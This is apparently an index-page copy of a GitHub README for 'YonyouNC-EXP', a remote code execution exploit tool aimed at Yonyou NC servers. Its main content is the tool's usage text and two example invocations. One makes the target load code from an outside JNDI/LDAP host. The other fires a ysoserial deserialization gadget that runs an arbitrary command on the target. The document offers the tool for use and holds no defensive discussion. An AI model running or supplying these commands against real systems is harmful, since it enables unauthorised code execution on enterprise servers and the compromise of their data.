An open API service indexing awesome lists of open source software.

https://github.com/OneSourceCat/YonyouNC-EXP

YonyouNC RCE
https://github.com/OneSourceCat/YonyouNC-EXP

Last synced: 4 months ago
JSON representation

YonyouNC RCE

Awesome Lists containing this project

README

          

# YonyouNC-EXP

```
usage: Options
-c,--cmd Command you wanna execute remotely
-g,--gadget Ysoserial Gadgets
-h,--help Usage of this tool
-j,--jndiUrl JNDI Server URL
-m,--Exploit Method How to RCE the target, value: jndi/serial
-t,--target Exploit target
Example:
java -jar yongyouNC-Exp.jar -t http://1.1.1.1/ -m jndi -j ldap://2.2.2.2/Exp
java -jar yongyouNC-Exp.jar -t http://1.1.1.1/ -m serial -g CommonsCollections1 -c "ping -n 1 www.qq.com"
```